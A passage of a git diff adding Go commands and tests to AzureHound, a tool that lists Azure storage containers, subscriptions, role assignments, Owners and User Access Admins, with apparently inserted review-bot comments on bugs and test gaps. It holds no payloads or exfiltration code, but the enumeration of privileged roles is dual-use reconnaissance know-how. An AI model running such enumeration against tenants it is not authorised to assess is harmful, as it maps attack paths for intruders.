+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listStorageContainers(ctx context.Context, client client.AzureClient, storageAccounts <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan interface{})
+ // The original size of the demuxxer cascaded into error messages for a lot of collection steps.
+ // Decreasing the demuxxer size only here is sufficient to prevent the cascade
+ // The error message with higher values for size is
+ // "The request was throttled."
+ // See issue #7: https://github.com/bloodhoundad/azurehound/issues/7
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+ for result := range pipeline.OrDone(ctx.Done(), storageAccounts) {
+ if storageAccount, ok := result.(AzureWrapper).Data.(models.StorageAccount); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating storage containers", "result", result)
+ return
+ } else {
+ if ok := pipeline.SendAny(ctx.Done(), ids, storageAccount); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for stAccount := range stream {
+ count := 0
+ for item := range client.ListAzureStorageContainers(ctx, stAccount.(models.StorageAccount).SubscriptionId, stAccount.(models.StorageAccount).ResourceGroupName, stAccount.(models.StorageAccount).Name, "", "deleted", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing storage containers for this subscription", "subscriptionId", stAccount.(models.StorageAccount).SubscriptionId, "storageAccountName", stAccount.(models.StorageAccount).Name)
+ } else {
+ storageContainer := models.StorageContainer{
+ StorageContainer: item.Ok,
+ StorageAccountId: stAccount.(models.StorageAccount).StorageAccount.Id,
+ SubscriptionId: "/subscriptions/" + stAccount.(models.StorageAccount).SubscriptionId,
+ ResourceGroupId: item.Ok.ResourceGroupId(),
+ ResourceGroupName: item.Ok.ResourceGroupName(),
+ TenantId: client.TenantInfo().TenantId,
+ }
+ log.V(2).Info("found storage container", "storageContainer", storageContainer)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZStorageContainer,
+ Data: storageContainer,
+ }); !ok {
+ return
+ }
+ }
+ log.V(1).Info("finished listing storage containers", "subscriptionId", stAccount.(models.StorageAccount).SubscriptionId, "count", count)
+ }
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all storage containers")
+ }()
+
+ return out
+}
diff --git a/cmd/list-subscription-owners.go b/cmd/list-subscription-owners.go
new file mode 100644
index 0000000..b351b8e
--- /dev/null
+++ b/cmd/list-subscription-owners.go
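Review bot: The container's `SubscriptionId` ends up double-prefixed: listStorageAccounts already stores `"/subscriptions/" + id` in `models.StorageAccount.SubscriptionId`, and this hunk prepends `"/subscriptions/"` to that field again; the same prefixed value is also passed as the first argument to `ListAzureStorageContainers`, which should be checked against what that client method expects. Using the stored value as is, `SubscriptionId: stAccount.(models.StorageAccount).SubscriptionId,`, would keep the account and container records consistent. The `log.V(1).Info("finished listing storage containers", ...)` call also sits inside the `for item := range ...` loop, so it fires once per container with a running count; it belongs after the closing brace of that loop. The comment above `streams` says the demux size is decreased here, but the code passes `config.ColStreamCount` like the other collectors.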
@@ -0,0 +1,108 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listSubscriptionOwnersCmd)
+}
+
+var listSubscriptionOwnersCmd = &cobra.Command{
+ Use: "subscription-owners",
+ Long: "Lists Azure Subscription Owners",
+ Run: listSubscriptionOwnersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listSubscriptionOwnersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure subscription owners...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ roleAssignments := listSubscriptionRoleAssignments(ctx, azClient, subscriptions)
+ stream := listSubscriptionOwners(ctx, azClient, roleAssignments)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listSubscriptionOwners(ctx context.Context, client client.AzureClient, roleAssignments <-chan interface{}) <-chan interface{} {
+ out := make(chan interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+
+ for result := range pipeline.OrDone(ctx.Done(), roleAssignments) {
+ if roleAssignments, ok := result.(AzureWrapper).Data.(models.SubscriptionRoleAssignments); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating subscription owners", "result", result)
+ return
+ } else {
+ var (
+ subscriptionOwners = models.SubscriptionOwners{
+ SubscriptionId: roleAssignments.SubscriptionId,
+ }
+ count = 0
+ )
+ for _, item := range roleAssignments.RoleAssignments {
+ roleDefinitionId := path.Base(item.RoleAssignment.Properties.RoleDefinitionId)
+
+ if roleDefinitionId == constants.OwnerRoleID {
+ subscriptionOwner := models.SubscriptionOwner{
+ Owner: item.RoleAssignment,
+ SubscriptionId: item.SubscriptionId,
+ }
+ log.V(2).Info("found subscription owner", "subscriptionOwner", subscriptionOwner)
+ count++
+ subscriptionOwners.Owners = append(subscriptionOwners.Owners, subscriptionOwner)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZSubscriptionOwner,
+ Data: subscriptionOwners,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing subscription owners", "subscriptionId", roleAssignments.SubscriptionId, "count", count)
+ }
+ }
+ }()
+
+ return out
+}
diff --git a/cmd/list-subscription-owners_test.go b/cmd/list-subscription-owners_test.go
new file mode 100644
index 0000000..7850fef
--- /dev/null
+++ b/cmd/list-subscription-owners_test.go
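Review bot: `roleDefinitionId == constants.OwnerRoleID` in listSubscriptionOwners is an exact string match, so an assignment whose role definition GUID comes back in a different letter case would be dropped from the owner list without any log line; whether the API can return that is not visible here, but for a privilege inventory a missed Owner is the costly failure. `if strings.EqualFold(roleDefinitionId, constants.OwnerRoleID) {` tolerates case differences and needs `strings` added to the import block. The same comparison against `constants.UserAccessAdminRoleID` is in listSubscriptionUserAccessAdmins. The `client` parameter is unused in both functions.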
@@ -0,0 +1,78 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListSubscriptionOwners(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan interface{})
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listSubscriptionOwners(ctx, mockClient, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- AzureWrapper{
+ Data: models.SubscriptionRoleAssignments{
+ SubscriptionId: "foo",
+ RoleAssignments: []models.SubscriptionRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.OwnerRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ },
+ },
+ },
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.SubscriptionOwners); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionOwners{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-subscription-role-assignments.go b/cmd/list-subscription-role-assignments.go
new file mode 100644
index 0000000..09ef036
--- /dev/null
+++ b/cmd/list-subscription-role-assignments.go
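Review bot: TestListSubscriptionOwners only checks the type of `wrapper.Data`, so it would still pass if the Owner filter matched nothing or everything. Binding the value and asserting its content, `} else if data, ok := wrapper.Data.(models.SubscriptionOwners); !ok {` followed by `} else if len(data.Owners) != 1 {`, plus one non-owner assignment in the fixture, would pin the filtering. TestListSubscriptionUserAccessAdmins has the same gap for `UserAccessAdmins`. The `TenantInfo()` expectation is not exercised by the function under test, and "recieved" in the last message should read "received".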
@@ -0,0 +1,132 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listSubscriptionRoleAssignmentsCmd)
+}
+
+var listSubscriptionRoleAssignmentsCmd = &cobra.Command{
+ Use: "subscription-role-assignments",
+ Long: "Lists Subscription Role Assignments",
+ Run: listSubscriptionRoleAssignmentsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listSubscriptionRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure subscription role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listSubscriptionRoleAssignments(ctx, azClient, subscriptions)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listSubscriptionRoleAssignments(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating subscription role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ subscriptionRoleAssignments = models.SubscriptionRoleAssignments{
+ SubscriptionId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "atScope()", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this subscription", "subscriptionId", id)
+ } else {
+ subscriptionRoleAssignment := models.SubscriptionRoleAssignment{
+ SubscriptionId: id,
+ RoleAssignment: item.Ok,
+ }
+ log.V(2).Info("found subscription role assignment", "subscriptionRoleAssignment", subscriptionRoleAssignment)
+ count++
+ subscriptionRoleAssignments.RoleAssignments = append(subscriptionRoleAssignments.RoleAssignments, subscriptionRoleAssignment)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZSubscriptionRoleAssignment,
+ Data: subscriptionRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing subscription role assignments", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all subscription role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-subscription-role-assignments_test.go b/cmd/list-subscription-role-assignments_test.go
new file mode 100644
index 0000000..73a74d8
--- /dev/null
+++ b/cmd/list-subscription-role-assignments_test.go
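Review bot: listSubscriptionRoleAssignments has no doc comment, and two behaviours are easy to miss: a listing error is only logged and the assignments gathered so far are still sent downstream as that subscription's set, and the `"atScope()"` filter is passed to `ListRoleAssignmentsForResource`. I would add above the function `// listSubscriptionRoleAssignments emits one SubscriptionRoleAssignments wrapper per subscription ID; on a listing error the assignments collected so far are still sent.` and a one-line comment at the call naming what the filter restricts. Consumers that derive owners and user access admins from this stream cannot tell a partial set from a complete one, which is worth stating where they will read it.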
@@ -0,0 +1,114 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListSubscriptionRoleAssignments(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockSubscriptionsChannel := make(chan interface{})
+ mockSubscriptionRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment])
+ mockSubscriptionRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockSubscriptionRoleAssignmentChannel).Times(1)
+ mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockSubscriptionRoleAssignmentChannel2).Times(1)
+ channel := listSubscriptionRoleAssignments(ctx, mockClient, mockSubscriptionsChannel)
+
+ go func() {
+ defer close(mockSubscriptionsChannel)
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ }()
+ go func() {
+ defer close(mockSubscriptionRoleAssignmentChannel)
+ mockSubscriptionRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.ContributorRoleID,
+ },
+ },
+ }
+ mockSubscriptionRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ }
+ }()
+ go func() {
+ defer close(mockSubscriptionRoleAssignmentChannel2)
+ mockSubscriptionRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ }
+ mockSubscriptionRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if data, ok := wrapper.Data.(models.SubscriptionRoleAssignments); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionRoleAssignments{})
+ } else if len(data.RoleAssignments) != 2 {
+ t.Errorf("got %v, want %v", len(data.RoleAssignments), 2)
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if data, ok := wrapper.Data.(models.SubscriptionRoleAssignments); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionRoleAssignments{})
+ } else if len(data.RoleAssignments) != 1 {
+ t.Errorf("got %v, want %v", len(data.RoleAssignments), 2)
+ }
+}
diff --git a/cmd/list-subscription-user-access-admins.go b/cmd/list-subscription-user-access-admins.go
new file mode 100644
index 0000000..c3f78fa
--- /dev/null
+++ b/cmd/list-subscription-user-access-admins.go
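Review bot: The last assertion checks `len(data.RoleAssignments) != 1` but its failure message still prints a wanted value of 2; it should be `t.Errorf("got %v, want %v", len(data.RoleAssignments), 1)`. The test also assumes the two-assignment result arrives first; if more than one demux stream is configured the two workers run concurrently, so the order may not be fixed (this depends on `config.ColStreamCount`, which is not visible here). Collecting both results and comparing their lengths without regard to order would remove that assumption.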
@@ -0,0 +1,109 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listSubscriptionUserAccessAdminsCmd)
+}
+
+var listSubscriptionUserAccessAdminsCmd = &cobra.Command{
+ Use: "subscription-user-access-admins",
+ Long: "Lists Azure Subscription User Access Admins",
+ Run: listSubscriptionUserAccessAdminsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listSubscriptionUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure subscription user access admins...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ roleAssignments := listSubscriptionRoleAssignments(ctx, azClient, subscriptions)
+ stream := listSubscriptionUserAccessAdmins(ctx, azClient, roleAssignments)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listSubscriptionUserAccessAdmins(ctx context.Context, client client.AzureClient, vmRoleAssignments <-chan interface{}) <-chan interface{} {
+ out := make(chan interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+
+ for result := range pipeline.OrDone(ctx.Done(), vmRoleAssignments) {
+ if roleAssignments, ok := result.(AzureWrapper).Data.(models.SubscriptionRoleAssignments); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating subscription user access admins", "result", result)
+ return
+ } else {
+ var (
+ subscriptionUserAccessAdmins = models.SubscriptionUserAccessAdmins{
+ SubscriptionId: roleAssignments.SubscriptionId,
+ }
+ count = 0
+ )
+ for _, item := range roleAssignments.RoleAssignments {
+ roleDefinitionId := path.Base(item.RoleAssignment.Properties.RoleDefinitionId)
+
+ if roleDefinitionId == constants.UserAccessAdminRoleID {
+ subscriptionUserAccessAdmin := models.SubscriptionUserAccessAdmin{
+ UserAccessAdmin: item.RoleAssignment,
+ SubscriptionId: item.SubscriptionId,
+ }
+ log.V(2).Info("found subscription user access admin", "subscriptionUserAccessAdmin", subscriptionUserAccessAdmin)
+ count++
+ subscriptionUserAccessAdmins.UserAccessAdmins = append(subscriptionUserAccessAdmins.UserAccessAdmins, subscriptionUserAccessAdmin)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZSubscriptionUserAccessAdmin,
+ Data: subscriptionUserAccessAdmins,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing subscription user access admins", "subscriptionId", roleAssignments.SubscriptionId, "count", count)
+ }
+ }
+ log.Info("finished listing all subscription user access admins")
+ }()
+
+ return out
+}
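Review bot: The third parameter of listSubscriptionUserAccessAdmins is named `vmRoleAssignments`, but the caller passes the output of listSubscriptionRoleAssignments and the body asserts `models.SubscriptionRoleAssignments`; `roleAssignments`, as in listSubscriptionOwners, would match what it carries. Renaming it means the inner `roleAssignments, ok := ...` should take another name, e.g. `assignments`, to avoid shadowing the parameter. This function logs `finished listing all subscription user access admins` on completion while listSubscriptionOwners logs nothing at that point, so the two should be aligned one way or the other.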
diff --git a/cmd/list-subscription-user-access-admins_test.go b/cmd/list-subscription-user-access-admins_test.go
new file mode 100644
index 0000000..1a6a8dc
--- /dev/null
+++ b/cmd/list-subscription-user-access-admins_test.go
@@ -0,0 +1,78 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListSubscriptionUserAccessAdmins(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan interface{})
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listSubscriptionUserAccessAdmins(ctx, mockClient, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- AzureWrapper{
+ Data: models.SubscriptionRoleAssignments{
+ SubscriptionId: "foo",
+ RoleAssignments: []models.SubscriptionRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.UserAccessAdminRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.UserAccessAdminRoleID,
+ },
+ },
+ },
+ },
+ },
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.SubscriptionUserAccessAdmins); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionUserAccessAdmins{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-subscriptions.go b/cmd/list-subscriptions.go
new file mode 100644
index 0000000..c1a6f24
--- /dev/null
+++ b/cmd/list-subscriptions.go
@@ -0,0 +1,115 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listSubscriptionsCmd)
+}
+
+var listSubscriptionsCmd = &cobra.Command{
+ Use: "subscriptions",
+ Long: "Lists Azure Active Directory Subscriptions",
+ Run: listSubscriptionsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listSubscriptionsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure active directory subscriptions...")
+ start := time.Now()
+ stream := listSubscriptions(ctx, azClient)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listSubscriptions(ctx context.Context, client client.AzureClient) <-chan interface{} {
+ out := make(chan interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+ var (
+ count = 0
+ selectedSubIds = config.AzSubId.Value().([]string)
+ selectedMgmtGroupIds = config.AzMgmtGroupId.Value().([]string)
+ filterOnSubs = len(selectedSubIds) != 0 || len(selectedMgmtGroupIds) != 0
+ )
+
+ if len(selectedMgmtGroupIds) != 0 {
+ descendantChannel := listManagementGroupDescendants(ctx, client, listManagementGroups(ctx, client))
+ for i := range descendantChannel {
+ if item, ok := i.(AzureWrapper).Data.(azure.DescendantInfo); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue evaluating management group descendants", "result", i)
+ return
+ } else if item.Type == "Microsoft.Management/managementGroups/subscriptions" {
+ selectedSubIds = append(selectedSubIds, item.Name)
+ }
